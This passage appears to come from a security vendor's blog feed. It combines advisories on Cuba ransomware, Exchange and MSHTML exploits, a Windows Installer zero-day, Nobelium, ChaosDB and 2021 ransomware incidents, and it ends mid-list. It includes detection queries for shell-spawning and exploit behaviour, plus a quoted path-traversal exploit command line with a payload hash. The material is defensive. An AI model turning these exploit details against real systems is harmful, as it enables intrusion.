- Remote Desktop Protocol (RDP) – Commonly used for remote access to Windows machines, RDP is a top attack vector if left open to connections from the public internet. Attackers brute-force or steal RDP credentials to gain initial access to systems. If you need to use RDP, make sure that you adhere to best practices to secure RDP, like ensuring that its traffic flows through a VPN connection protected by multi-factor authentication.
Detect Attacker Communications & Ransomware Distribution
After gaining initial access using any number of methods listed above, the threat actors will then use certain tools and techniques to communicate to their command and control servers, as well as distribute malicious software, including:
- Cobalt Strike Beacon – Cuba ransomware will install and execute a Cobalt Strike Beacon as a service on a victim’s network via PowerShell. Cobalt Strike Beacon sends and receives encrypted commands to a command and control (also known as C2 or C&C) server controlled by the attacker, which can include instructions to download malware. This is part of a post-exploitation framework intended for use by penetration testers, but also abused by criminals.
- PowerShell, PsExec – Threat actors will use legitimate Windows services and administrative privileges to deploy ransomware payloads remotely and encrypt their victims’ files using the .cuba extension, according to the FBI alert. PowerShell is a Windows command-line interface and scripting environment used to automate management tasks. But threat actors also abuse PowerShell to execute code and discover information in your Windows environment. These types of attacks are harder to detect since they use built-in administrative tools to accomplish the end goal. Learn more about Blumira’s latest PowerShell detections.
Automate Attacker Detection For Faster Response
As we get closer to the holidays, it’s important to note that ransomware actors often strike during company off-times, such as weekends and holidays. Keeping vigilant during these times can be made easier by automating your threat hunting so you can detect indicators of an attack outside of typical working human hours.
Monitoring your environment for signs of this type of activity can be time-consuming and difficult for small IT teams, operating without an in-house security operations center (SOC). As a SOC alternative, Blumira’s platform is designed to automatically identify attacker behaviors (including all of the methods listed above), then notify you and provide playbooks to respond to these indicators of a potential attack in progress. For urgent priority issues, Blumira’s responsive and experienced security operations team is on standby 24/7 to guide you through incident response procedures.
Early detection is key to stopping a ransomware attack from widespread damage to your business. Learn more about Ransomware Prevention & Detection with Blumira.
Low
Malware in 2021 was more sophisticated and evasive than ever before. We saw the growth of ransomware-as-a-service, the emergence of fake software updates, and the resurfacing of Emotet.
What will 2022 bring? To protect your organization in the new year, it’s good to have some idea of what lurks around the corner — as well as security best practices that will keep you covered against the most elusive types of malware.
No one has a crystal ball, but security experts Aviv Grafi, CTO and Co-Founder of Votiro and Matthew Warner, CTO and Co-Founder of Blumira, will share predictions of the malware landscape in 2022 based on real data and on-the-ground experiences.
They’ll discuss:
- How evasion techniques might evolve in 2022
- Best practices to keep you ahead of the malware curve — no matter what your team size or budget
- Is Emotet malware here to stay in 2022?
This interactive, conversational-style session encourages questions and engagement with viewers – so sign up today for access to our security experts.
Participants
Matthew Warner, CTO and Co-Founder, Blumira
Matt is CTO and Co-Founder of Blumira, a leading cybersecurity provider of automated threat detection and response technology. At Blumira, he leads the security and engineering efforts to provide actionable insights into cybersecurity risks at scale. Matt has over 10 years of experience in IT and development, focusing on business strategy, development, compliance, threat detection and penetration testing. Previously, he was Director of Security Services, Development & Security at NetWorks Group, responsible for defensive information security and services.
Aviv Grafi, CTO and Co-Founder, Votiro
Aviv Grafi is CTO & Founder of Votiro, an award-winning cybersecurity company specializing in sanitizing files of all kinds through Votiro’s Secure File Gateway solutions. Prior to co-founding Votiro, Aviv served in an elite intelligence unit of the IDF, nurturing his passion for finding simple solutions to complex security issues. Aviv's areas of expertise span the cyber product lifecycle—from strategy and development, through go-to market—along with network security, IDS/IPS/firewall internals, defensive programming, enterprise security penetration testing, vulnerability research, and virtualization.
Critical
What Happened
Security researcher Janggggg (@testanull on Twitter) published a proof-of-concept exploit for CVE-2021-42321, a remote code execution (RCE) vulnerability in Microsoft Exchange that affects on-premises servers running Microsoft Exchange 2016 and 2019, including those using Exchange Hybrid mode.
This exploit enables authenticated threat actors to execute code remotely on vulnerable servers and launch an attack.
Microsoft’s November 2021 Patch Tuesday addresses the vulnerability, so administrators should patch immediately.
How Bad is This?
A remote code execution vulnerability is always severe because it enables potential threat actors to launch attacks without local access to a machine. Microsoft issued a base metric score of 8.8, which notes high severity.
This vulnerability essentially is a bug in how Exchange allowed certain data to be stored in the BinaryData section of a UserConfiguration on a folder. When a UserConfiguration is set with a payload in the BinaryData and then the attacker requests a ClientAccessToken, it triggers a deserialization bug which results in execution of the payload in BinaryData.
Fortunately, Microsoft’s November patch will mitigate the risk. Plus, threat actors must be authenticated users to take advantage of the bug.
What Should I Do?
Administrators should immediately install the patches issued in Microsoft’s November Patch Tuesday.
Admins running Exchange servers should also check to see if attackers have attempted to exploit them. Admins can run the following PowerShell query on each server to check for specific events in the Event Log, according to Bleeping Computer:
Get-EventLog -LogName Application -Source "MSExchange Common" -EntryType Error | Where-Object { $_.Message -like "*BinaryFormatter.Deserialize*" }
How To Detect
In the end this vulnerability and attack does not differ much from previous attacks in 2021. The attack itself has a set number of steps that must be run against an authenticated user, update specific configurations on that user, and then execute the actual vulnerability against the host itself.
This PoC attack requires execution of 4 POSTs in a chain against Exchange with an authenticated user to be successful. It is possible to detect this attack using the following logic, although it may have false positives without some tuning in your environment.
4 POSTs to /ews/exchange.asmx on IIS from a Public IP with User-Agent ExchangeServicesClient/15.01.2308.008 – over a short period of time. This detection will depend heavily on the User Agents seen in your environment and may result in false positives:
src_ip = <Public IP>
AND agent="ExchangeServicesClient/15.01.2308.008"
AND url="/EWS/Exchange.asmx"
AND method="POST"
Otherwise Blumira recommends using Sysmon to detect the same as other Exchange vulnerabilities. By their nature, they require the IIS/Exchange service w3wp.exe to be leveraged to pivot into another process. In these situations we expect to see patterns out of Sysmon process triggering such as:
user LIKE "%DefaultAppPool%"
AND parent_process_name LIKE "%w3wp.exe%"
AND process_name LIKE "%cmd%"
This will tell you whenever your w3wp (IIS) service is spawning command shells and/or similar processes within the process_name, depending on the pivot you’re attempting to identify.
How Blumira Can Help
It’s nearly impossible for admins to track every vulnerability, but Blumira’s security experts perform threat hunting on your behalf and develop detections in real time to protect your environment. Blumira can detect activity related to Microsoft Exchange exploits, as well as many other security incidents.
Blumira’s free trial is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.
Sign up for a free trial to start detecting and mitigating exposure related to Windows vulnerabilities.
Learn More In Our Livestream
Dealing with yet another Microsoft vulnerability before a holiday weekend is frustrating, but Blumira’s security experts can help.
Watch our livestream with Blumira’s Matthew Warner, CTO and Co-Founder, to get your questions answered before you sign off for the holiday.
Critical
What Happened?
Security researcher Abdelhamid Naceri discovered a privilege escalation vulnerability in Microsoft Windows that can give admin rights to threat actors.
The vulnerability was discovered when Microsoft released a patch for CVE-2021-41379 (Windows Installer Elevation of Privilege Vulnerability) as a part of the November 2021 Patch Tuesday. Naceri found a bypass to the patch, as well as a more severe zero-day privilege escalation vulnerability, and published a proof-of-concept exploit for the zero-day on GitHub.
This zero-day vulnerability affects all supported client and server versions of Windows, including Windows 10, Windows 11 and Windows Server — even with the latest patches.
How Bad is This?
Pretty bad; privilege elevation is a serious situation, especially when threat actors could elevate from user to admin rights. Throughout 2021 we have seen a growing number of privilege escalation vulnerabilities land on Windows, which is only increasing the attack surface in environments at this point.
There are no workarounds currently available, according to Naceri. Due to the fact that this vulnerability and exploit leverage existing MSI functionality, it is difficult to inherently workaround.
The good news is that a threat actor would need local access to the machine to take advantage of this vulnerability. More good news is that Windows Defender detects the PoC.
What Should I Do?
Organizations that haven’t already enabled Sysmon in their environment should do so. Blumira’s newly-created PowerShell script, Poshim, streamlines Windows log collection by automatically installing and configuring NXLog and Sysmon to ship logs over Sysmon to a targeted IP.
Opatch, a micropatching service, released unofficial patches for the following affected Windows versions:
- Windows 10 v21H1 (32 & 64 bit) updated with November 2021 Updates
- Windows 10 v20H2 (32 & 64 bit) updated with November 2021 Updates
- Windows 10 v2004 (32 & 64 bit) updated with November 2021 Updates
- Windows 10 v1909 (32 & 64 bit) updated with November 2021 Updates
- Windows 10 v1903 (32 & 64 bit) updated with November 2021 Updates
- Windows 10 v1809 (32 & 64 bit) updated with May 2021 Updates
Windows 10 21H2 is affected, too, but is not yet supported by 0patch.
To install the patch, you must register for an 0patch account and install an 0patch agent through their website. Installing the agent will cause the patch to automatically download. While micropatching is a new method for prevention, it is generally safe to utilize on endpoints that could be impacted. We recommend testing the 0patch micropatches on your test machines like you would test normal Windows patches previous to full patch release.
Additionally, admins can use an endpoint solution and a security incident and event management (SIEM) platform to detect for signs of the PoC exploit in an environment.
How To Detect
This PoC code is easily detectable in its current form due to a built-in MSI (or installer package) and the fact that the PoC has a number of hard-coded naming conventions.
Blumira security experts tested the exploit in their lab environment and found a few ways to detect the PoC:
Sysmon
With Sysmon enabled, admins can look for the following behaviors:
windows_event_id = 11AND target LIKE '%microsoft plz%'
By default the PoC utilizes a target with “microsoft plz” in the path, this allows for quick detection opportunities for lazy attackers.
AND
process_name = 'C:\\Windows\\system32\\msiexec.exe'AND target LIKE '%AppData%splwow64.exe'AND windows_event_id in (11,26)
The second sysmon detection uses splwow64.exe in its own AppData folder, which it creates and deletes during the process.
Windows logs
Admins can look for the following Windows logs in Event Log Viewer:
windows_log_name='Application'AND message LIKE '%test pkg%'
Application logs that contain hardcoded test pkg similar to “microsoft plz” above. Attackers building their own exploits will not utilize this naming convention, however.
AND
REGEXP_CONTAINS(message, r'Users.*AppData\\Local\\Temp\\2\\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\}.msi')AND user='SYSTEMAND user_id='S-1-5-18'AND windows_event_id=1042
The System’s Application log as system references the initial User’s appdata with the System user and SID (S-1-5-18) and user on a failed MSI install. Message for Blumira is seen in the below blob, the general message details. So far in our testing, we were able to reduce false positives but looking for a specific UUID4 format due to how this MSI installer activates but this may result in noise at times.
Application Eventlog
Search for EventID 1033 and the keyword ‘test pkg’
How Blumira Can Help
It’s nearly impossible for admins to track every vulnerability, but Blumira’s security experts perform threat hunting on your behalf and develop detections in real time to protect your environment. Blumira can detect activity related to this Windows exploit, as well as many other security incidents.
Blumira’s free trial is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.
Sign up for a free trial to start detecting and mitigating exposure related to Windows vulnerabilities.
Learn More In Our Livestream
Dealing with yet another Microsoft vulnerability before a holiday weekend is frustrating, but Blumira’s security experts can help.
Watch our livestreamwith Blumira’s Matthew Warner, CTO and Co-Founder, to get your questions answered before you sign off for the holiday.
Medium
A set of recent attacks have been attributed to Nobelium, the same nation-state actor behind the SolarWinds attack in 2020.
The attacks began in May, with Microsoft notifying more than 140 resellers and service providers that were targeted by Nobelium (14 estimated to be compromised), and 609 customers that were attacked over 22,000 times.
The latest attacks on organizations within the global IT supply chain, as reported by Microsoft, are similar to what we’ve seen in the Kaseya ransomware attack in July:
- Both target resellers or managed service providers (MSPs) that customize, deploy and manage IT or cloud services on behalf of their customers
- The attacks leverage the direct access resellers/MSPs may have to customer IT systems
To protect against observed attack tactics of Nobelium, MSPs should strengthen their preventative and defensive security posture by putting a few basic security measures in place, including using multi-factor authentication, applying the principles of least privilege, and implementing a detection and response solution that can help them identify early indicators of an attack in progress.
The Attack Methods of Choice: Password Spraying, Phishing & Privileged Accounts
A key difference in these latest attacks is the type of methods used against victim organizations and service providers. Instead of exploiting a flaw in the remote management and monitoring (RMM) software, as was seen in the Kaseya ransomware attack against MSPs, Nobelium has been reported to use password spraying and phishing to steal credentials and access systems.
In Microsoft’s guidance for MSPs and cloud service providers on handling the recent attacks, it also notes that privileged accounts are being targeted, in particular:
Microsoft has observed Nobelium targeting privileged accounts of service providers to move laterally in cloud environments, leveraging the trusted technical relationships to gain access to downstream customers and enable further attacks or access targeted systems. – Microsoft Partner Network team
After stealing credentials and compromising accounts at the service provider level, Nobelium then leverages privileged access (delegated administrative privileges – DAP) to further downstream attacks through externally-facing VPNs or solutions that enable network access for providers.
Prevention: Multi-Factor Authentication; Least Privilege
These types of identity-based attacks aren’t new, but they still tend to work, as many service providers fail to put into place basic security measures that can deter the success of these attacks:
- Multi-Factor Authentication (MFA) – Implement this on everything that you log into, especially any critical applications that allow access to your customers or customer data. It can go a long way to stop an attacker from leveraging a single password (stolen or brute-forced via password spraying or phishing) to gain access to your entire customer base. Microsoft has required its resellers to enable MFA to access their cloud portals and underlying services.
- Least Privilege – Further reduce your overall attack surface by keeping track of user privileges and limit them to only what they need access to in order to complete their job duties. Reduce the scope of your risk by allowing fewer users access to customer-related systems and accounts, or limit to an as-needed basis.
Detect Early to Prevent Customer Compromise
In addition to taking preventative measures, detecting Nobelium’s noted attack methods in your environment early enough can enable your IT team to quickly respond and contain/block the threat before it results in customer compromise.
Identifying the following attacker behaviors can help you focus on real threats and reduce false positives:
Password Spraying. If protected by only a single factor, the odds of an attacker successfully brute-forcing their way into your systems using this method are high. Blumira identifies and notifies you of any password spraying attempts seen against your accounts, including domain controllers, which indicates an attacker is trying to use methodical methods to access your environment while avoiding detections or lockout protections.
Privileged User Account Changes. Attackers may add users to highly privileged groups, or enable privileged user accounts to gain access to more resources and gain persistence; also known as the different techniques an attacker may use to maintain their foothold on your systems (despite restarts, changed credentials or other interruptions that could cut off their access). Blumira detects privileged account activity that could be suspicious so you can investigate further.
Anomalous MFA Login Activity. Monitoring your MFA applications for unusual activity can help you detect potential attacker behavior early. For example, Blumira detects and notifies your IT team of MFA account lockouts, attempted logins from outside of the U.S., unfeasible or geo-impossible logins by the same user across different locations within a short period of time, and much more.
This is especially key to monitor as Microsoft has noted that “Nobelium has been observed authenticating to accounts from anomalous locations that might trigger impossible travel analytics or fail to pass deployed conditional access policies.”
Credential-Stealing Activity. As noted above, Nobelium may attempt to steal credentials to gain access and move around an environment laterally. Blumira detects any credential-stealing activity and alerts you to the IP address and device it originates from, such as behavior that matches known hacking tools used to elevate privileges on a targeted host (e.g, Mimikatz pass-the-hash).
Azure AD & Microsoft 365 Login Activity. Since this attack is also targeting cloud service providers, Microsoft has advised partners to review and audit Azure AD logins and configuration changes, as well as your existing log availability and retention strategy for cloud-based resources like Microsoft 365. Blumira tracks login attacks against Azure, as well as the creation or modification of a Microsoft 365 group, when a user clicks a malicious URL, unusual administrative activity, emails reported as malware or phishing, and more to keep you aware of ongoing cloud security events.
This is critical to monitor and detect in a timely manner, as Microsoft has said that “Nobelium has been observed modifying Azure AD to enable long-term persistence and access to sensitive information. This can include the creation of users, consent of Azure AD applications, granting of roles to users and applications…”
Learn More
See additional resources for logging this type of activity, including:
- Documentation for how to quickly and easily set up Blumira’s platform with third-party integrations to start collecting logs, detecting threats and how to respond: Windows Server, Azure AD, Microsoft 365, Duo Security, Okta
- Microsoft security use cases to learn what we integrate with, how we help with advanced Windows logging and more
- Guidance for partners on specific steps they can take to protect and detect Nobelium-related attacks, from Microsoft
Blumira’s cloud SIEM and security operations team can help MSPs protect themselves and their customers against the many attack methods of Nobelium and other threat actors. We provide:
- Easy-to-deploy and affordable platform, designed to be set up by your existing team in hours and suited to SMB needs
- A single centralized dashboard with multi-tenancy to make management simple for MSPs with multiple clients
- Pre-built detections based on attacker behavior to help reduce alert fatigue, with automated blocking and playbooks for every finding to guide you through response
- A responsive security operations team you can reach out to for expertise and ongoing support to help you continuously improve your security coverage
Learn more about Blumira’s partners program and reach out to us if you’d like to sign up.
Critical
What Happened
Microsoft, Mandiant and EXPMON researchers discovered a set of flaws in MSHTML (Internet Explorer’s browser engine) that remote, unauthenticated attackers can use to execute code on a system.
Threat actors are exploiting this zero-day vulnerability in the wild by creating weaponized Office documents to hijack vulnerable Windows systems. Threat actors can use a malicious ActiveX control for an Office document that hosts the browser rendering engine. The attacker would need to persuade a user to open the malicious file, according to Microsoft.
How Bad is This?
The CVE has a severity rating of 8.8 out of 10 and affects Windows Server 2008 through 2019 and Windows 8.1 through 10. EXPON confirmed via Twitter that they reproduced the attack using Office 2019/Office 365 on Windows 10:
We have reproduced the attack on the latest Office 2019 / Office 365 on Windows 10 (typical user environment), for all affected versions please read the Microsoft Security Advisory. The exploit uses logical flaws so the exploitation is perfectly reliable (& dangerous).
— EXPMON (@EXPMON_) September 7, 2021
The good news: the default setting for Microsoft Office opens documents from the internet using Protected View or Application Guard for Office, which prevents the attacks.
To determine the severity of this vulnerability, it’s important to consider the context. Word is currently one of the most common tools used for initial access. For example, CVE 2017-11882 accounted for nearly three-quarters of all exploits leveraged in Q4 2020, according to a report from HP Bromium.
CVE-2021-40444 will give adversaries yet another way to access Word — which is by no means lacking in existing methods to attack — and will likely have a long tail in terms of exploitation. It still requires people to bypass the “internet protection” step, but does not require the same additional step as macros.
What Should I Do?
Microsoft recommends disabling the installation of ActiveX controls in Internet Explorer by updating the registry.
Microsoft provides the following instructions in its advisory documentation:
To disable installing ActiveX controls in Internet Explorer in all zones, paste the following into a text file and save it with the .reg file extension:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1001"=dword:00000003
"1004"=dword:00000003
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1001"=dword:00000003
"1004"=dword:00000003
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1001"=dword:00000003
"1004"=dword:00000003
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1001"=dword:00000003
"1004"=dword:00000003
Double-click the .reg file to apply it to your Policy hive.
Reboot the system to ensure the new configuration is applied.
This may seem like an easy mitigation, but some organizations have applications that use ActiveX and will be unable to use this workaround. In those cases, admins should reinforce training on Protected View with End Users to ensure that emailed and downloaded documents do not leave Protected View until patches can be applied. The exploits cannot be triggered until a document moves into “Edit” mode away from Protected View. If you previously disabled Protected View, you should enable it immediately if you cannot disable ActiveX.
How To Detect
Blumira is actively developing detection opportunities in our lab environment. Early reports indicate that possible EDR detection of execution may include control.exe with command arguments including cpl:../../../…
Organizations running both Microsoft Defender Antivirus and Microsoft Defender for Endpoint will be able to detect the exploit without taking additional action, according to Microsoft.
However, it is important to note that organizations running just Microsoft Defender for Endpoint (not AV) are not protected by default. In that case, you must set EDR to block mode.
Microsoft’s guidance for this requires you to be running their AV and EDR tooling, directs you to definitions 1.349.22.0 which I suspect is a typo (they’re on .222), and says if you run Defender you do not need to take additional action. EDR in block mode isn’t default.. pic.twitter.com/vcZsFzjlNB
— Kevin Beaumont (@GossiTheDog) September 7, 2021
Update 9/8/2021 @ 5:35 PM ET: According to Kevin Beaumont aka Twitter user GossiTheDog, threat actors can potentially bypass the Microsoft workaround.
For bonus points I just modified it to not need a new ActiveX control, which beats the MS work around. Took about a minute. 🤦♀️https://t.co/oaVfJfzZcb
— Kevin Beaumont (@GossiTheDog) September 8, 2021
If this is true, you should rely on detections to mitigate your risk.
Update 9/9/2021 @ 9:35 AM ET: Well, things are still bad, will continue to be bad, but not all that much more bad than the rest of Office threat landscape ¯\_(ツ)_/¯
At Blumira, we’re still working on detection opportunities in our lab environment. One of the more promising detection opportunities we’re looking at is with parent/child process relationships between Office products and control.exe, but we haven’t confirmed this yet. Also, .inf loads are pretty well expected at this point, so detection should work with that in mind. There are also .cab files that are dropped and extracted which may be a detection point as well. Here’s one of the .cab files we pulled down yesterday: 94e5f6d9921493645ad47df612edfc67683a075eaa9e25c7e61298491b097b64 Payload/ministry.cab
Update 9/13/2021 @ 10:04 AM ET:
- It’s dead simple and we wouldn’t be surprised if MS comes back with a “working as intended” but we’ll see. Nothing done here is particularly magical and if this is really the first time this is being exploited, it was more of an oversight of techniques by attackers than it was a new magical vulnerability.
- Any document that can support an externally linked OLE Object that can reference ActiveX can potentially be weaponized. That makes it quite easy to weaponize modern Office files due to how easy it is to modify the XML one unzipped. We could see Autodesk CAD or similar tools that leverage OLE being used here as well potentially, that’s a much more refined/focused campaign then docx though. Most/many would have Word, only specific targets would be using CAD.
- It’s however much harder to do it in a way that AV/EDR tools won’t be able to detect the file once it’s pulled down, Defender (default) seems to detect the final stage whereas Defender ATP (fancy) detects the initial loader.
- The initial loader patterns that were being detected in the document references (
word/_rels/document.xml.rels -> !x-usc:) does not appear to be required so there may be some avoidance if signatures aren’t updated. However the actual behaviors once exploitation starts involved likely won’t be changing much until we get to fileless.
- The detection for EDR/AV is strong already, this requires (right now) a file to be downloaded (.cab file) extracted and then the .dll (.inf named files) within the cab are run against the control.exe in the ActiveXObject. This means that the attacker not only has to get past signature detection for the initial docx (or similar Office file), but also through the downloaded external html file and the downloaded .cab file.
- To detect, we recommend enabling Sysmon. Here’s a snippet pulled from a host that was exploited with Sysmon, even just detecting with a basic like something such as “%control.exe%.inf” should get pretty quick detection on the current implementation:
<Data Name="ParentCommandLine">"C:\Windows\System32\control.exe" ".cpl:../../msword.inf",</Data>
Update 9/15/2021 @ 10:50 AM ET: Microsoft released a patch last night as a part of Patch Tuesday. The main focus of this attack, .docx, still does the external template gathering but does not appear to execute the downloaded exploit. We are still doing more testing around this, but the patch at least does appear to resolve the issues around this specific exploit.
While this appears to mitigate the worry of current ActiveX exploitation, this still leaves the concern of remote templates being loaded and executed. The risk for this now migrates to attack methods such as URI Scheme manipulation of vulnerable applications by leveraging javascript to redirect the endpoint to a specific location once the document is opened. There have been no real world examples of this exploitation method as of yet, however and ensuring your applications are up to date will always help defend against this vector.
We’ll update this post as we find out more.
Detect Indicators of Attacks With Blumira
Blumira can detect activity that is indicative of NTLM Relay attacks, as well as many other Microsoft security incidents. By easily integrating Blumira’s detection and response platform with your Windows environment, you can identify indicators of an attack in progress and contain threats to minimize their impact.
Blumira’s free trial is easy to deploy; IT and security teams can start seeing immediate security value for their organizations. Sign up for a free trial to start detecting and mitigating exposure related to Windows vulnerabilities.
For more information on how to secure against Windows vulnerabilities, download our free guide:
Medium
What Happened?
On August 27, Wiz, a cloud security provider, publicly disclosed a series of flaws in Azure’s database service, Cosmos DB, that enables any user to download, remove or change company databases without any other credentials.
The flaw was found in Jupyter Notebook, an open-source visualization tool often used for statistical modeling, machine learning, and data cleaning. Although the tool has been available in Cosmos since 2019, Microsoft enabled it by default for Cosmos in February 2021.
To gain access to the Cosmos database, Wiz researchers first accessed customers’ Cosmos primary keys, which enable full read, write and delete access to customer data. The notebook container allowed for privilege escalation into other customers’ notebooks, according to Wiz.
Wiz researchers discovered the vulnerability, which they named ChaosDB, on August 9 and informed Microsoft on August 12. Microsoft disabled the buggy Jupyter Notebook feature on August 14. The vulnerability has not been exploited in the wild, and no customer data was affected, according to Microsoft.
However, Microsoft’s recent track record for effectively communicating about its vulnerabilities has been suspect, according to various security experts. Microsoft caused confusion during July’s PrintNightmare incident when it first misdiagnosed the severity of the bug, only to update the documentation later on with confirmation that the vulnerability was a remote code execution.
According to Wiz, Microsoft only warned 30% of its customers about the vulnerability. The actual number of customers affected by ChaosDB is higher, Wiz researchers claimed.
How Bad is This?
Wiz CTO Ami Luttwak, who was previously CTO of Microsoft’s Cloud Security Group, called ChaosDB “the worst cloud vulnerability you can imagine.” The flaw left customers’ Cosmos DB databases exposed for the last two years.
If someone other than Wiz had found the same flaw between February 2021 and now and was able to find and enumerate a company’s Cosmos DB, there would have been far more risk.
However, the flaw was mitigated when Microsoft disabled the buggy Juptyer Notebook feature, according to Wiz.
What Should I Do?
Microsoft advises all Cosmos DB customers to regenerate their primary keys, a task that Microsoft cannot complete on their customers’ behalf.
The company also provided several other steps to secure Cosmos DB:
- As a standard security best practice, consider using the Azure Cosmos DB firewall and virtual network integration to control the access to your accounts at the network level.
- If you are using the Azure Cosmos DB Core (SQL) API, consider using the Azure Cosmos DB role-based access control (RBAC) to authenticate your database operations with Azure Active Directory instead of primary/secondary keys. With RBAC, you have the option to completely disable your account’s primary/secondary keys.
- For a complete overview of the security controls available on Azure Cosmos DB, refer to our security baseline.
Cloud customers should be aware of the inherent risks involved with allowing a vendor to store customer data. Cloud services aren’t assigned CVEs, so flaws like ChaosDB get silently patched. A customer may or may not get notified about their exposure because it is up to the vendor to decide whether to perform secure auditing or pentesting.
Security experts, including those at Wiz, believe that there should be an industry initiative to develop a CVE repository for cloud services.
There is a massive gap in cloud security, by the way. No CVE numbers are issued for flaws, and suppliers aren’t required to disclose flaws. Cloud services aren’t magically secure.
You’ll notice public disclosure of this comes from an external researcher.
— Kevin Beaumont (@GossiTheDog) August 27, 2021
How To Detect
Organizations running cloud services should have monitoring capabilities in place to avoid exposure to flaws like ChaosDB. As Wiz notes in their latest update a number of the actions involved in this are not logged out without additional efforts, such as the last time a key was regenerated. However, there are a number of opportunities for monitoring to ensure your data is audited and properly secure.
IT and security teams should be able to monitor:
- Azure Access to IAM and other administrative actions
- Azure Cosmos DB Access via Role Base Access by enabling Diagnostic Logs
- Malicious access to other systems like Office 365 and Azure AD where these accounts may have roles that can impact your cloud infrastructure
How Blumira Secures Azure Cloud
Blumira’s cloud-based security leverages threat intelligence and behavioral analytics to detect attacker attempts to log in to your systems, including geo-impossible logins and fraudulent login attempts that could indicate the theft of usernames and passwords.
Blumira easily integrates with AWS and Microsoft Azure to detect misconfigurations, suspicious logins and other behaviors to limit its security impact on your environment.
Low
So far, 2021 has been a busy year for ransomware actors. The number of ransomware attacks in the first half of 2021 has already outperformed all of 2020 (SonicWall).
Let’s explore why 2021 has been a year of frequent and high-profile ransomware attacks, and how those attacks have played out.
Why Is Ransomware Increasing In 2021?
The recent spike can partially be attributed to ransomware-as-a-service, an underground market in which ransomware developers outsource their operations to affiliates who then execute the attack. Ransomware affiliates don’t need to have as much technical expertise, which significantly lowers the barriers to entry.
While ransomware actors are experiencing lower barriers to entry, the financial impact for ransomware victims is higher. In 2020, 32% of ransomware victims needed to pay the criminals to decrypt their data, which was a 23% increase compared to the previous year (Sophos). And the average ransomware payment in 2021 is higher — specifically, 82% higher year over year (PurpleSec).
All of this points to the idea that ransomware is an increasingly profitable industry. Not only that, but it is becoming a professionalized and sophisticated business. DarkSide — the ransomware gang that brought in at least $60 million before it announced it was shuttering its operations — offered a full customer service department complete with real-time chat support. Success breeds success, and this profitability enables ransomware gangs to pour money into efforts like research and development, which will fuel the ransomware industry even further.
Top 10 Ransomware Attacks of 2021
In just the first half of 2021, we saw a variety of high-profile ransomware attacks that have impacted supply chains and even incited the Biden administration to take action against cybercriminals.
Here’s an overview of 10 major ransomware attacks, in the order of when they occurred.
1. Kia Motors
In February, car manufacturer Kia Motors America (KMA) was the victim of a ransomware attack that impacted both internal and customer-facing systems, including mobile apps, payment services, phone services, and dealerships’ systems. The attack also affected IT systems that customers needed to take delivery of new vehicles.
DoppelPaymer was believed to be the ransomware family that targeted Kia, and the threat actors claimed to have also attacked Hyundai Motors America, Kia’s parent company. Hyundai also experienced similar system outages.
However, both Kia and Hyundai denied being attacked — a common tactic that victims use in an attempt to preserve reputation and customer loyalty.
2. CD Projekt Red
In February, CD Projekt Red, a video game company based in Poland, suffered from a ransomware attack that caused severe disruptions in the development of their highly-contested upcoming release, Cyberpunk 2077. The threat actors reportedly stole source codes for several of the company’s video games, including Cyberpunk 2077, Gwent, The Witcher 3, and the unreleased version of The Witcher 3.
According to CD Projekt Red, the illegally obtained data is now being circulated online. The company also said that it implemented several security measures after the attack, including new firewalls with anti-malware protection, a new remote-access solution and a redesign of core IT infrastructure.
3. Acer
In March, Taiwanese computer manufacturer Acer was a victim of a REvil ransomware attack. This attack was particularly noteworthy due to its demand of $50,000,000 — the largest known ransom to date.
Prior to the attack, the REvil gang targeted a Microsoft Exchange server on Acer’s domain, according to Advanced Intelligence, which points to a possible weaponization of the Microsoft Exchange vulnerability.
4. DC Police Department
In April, the Metropolitan Police Department in D.C. experienced a ransomware attack by a Russian ransomware syndicate known as the Babuk group. The police department refused to comply with the group’s $4 million demand in exchange for not leaking the agency’s data.
The attack resulted in a massive leak of internal information — amounting to 250GB in data — that included police officer disciplinary files and intelligence reports. Experts said that it was the worst ransomware to hit a U.S. police department.
5. Colonial Pipeline
Colonial Pipeline was arguably the most high-profile ransomware attack of 2021. Colonial Pipeline is responsible for transporting nearly half of the East Coast’s fuel. The ransomware attack was the largest cyberattack to target an oil infrastructure in the United States’ history.
On May 7, the DarkSide group deployed ransomware on the organization’s computerized equipment that manages the pipeline. Colonial Pipeline’s CEO revealed DarkSide’s attack vector as a single compromised password to an active VPN account that was no longer in use. Since Colonial Pipeline didn’t use multi-factor authentication, the attackers were more easily able to access the company’s IT network and data.
While the attack didn’t affect operational technology systems, it did compromise the company’s billing system, which forced Colonial Pipeline to temporarily halt operations. President Biden declared a state of emergency in an effort to alleviate potential gas shortages. However, the attack resulted in fuel shortages in multiple airports, causing American Airlines to temporarily change flight schedules. It also resulted in panic buying and fuel shortages, and the average fuel price rose to the highest price since 2014 at over $3 per gallon.
Within several hours of the attack, Colonial Pipeline paid the requested ransom of $4.4 million with the assistance of the FBI. On June 7, the Department of Justice announced that it had recovered approximately $2.3 million of the ransom payment.
6. Brenntag
Brenntag, a chemical distribution company headquartered in Germany, was also hit with a DarkSide ransomware attack around the same time as Colonial Pipeline in May. The attack, which impacted the company’s North America division, resulted in 150 GB of stolen sensitive data, according to DarkSide. According to DarkSide affiliates, they gained access through purchasing stolen credentials. Threat actors often purchase stolen credentials — such as Remote Desktop credentials — via a dark web marketplace, which is why it’s important to deploy multi-factor authentication and detect risky RDP connections.
DarkSide’s initial demand was 133.65 Bitcoin, or about $7.5 million — which would have been the largest ever payment. Through negotiations, Brenntag was able to lower the ransom to $4.4 million, which they paid.
7. Ireland’s Health Service Executive (HSE)
Ireland’s HSE, which provides healthcare and social services, was hit by a variant of Conti ransomware in May. Following the attack, the organization shut down all of its IT systems. This affected many health services in Ireland, such as processing blood tests and diagnostics.
The organization refused to pay the ransom of $20 million in Bitcoin and avoided paying because the Conti ransomware group handed over the software decryption key for free. However, the health service in Ireland still faced months of significant disruption as it restored 2,000 IT systems affected by the ransomware.
8. JBS
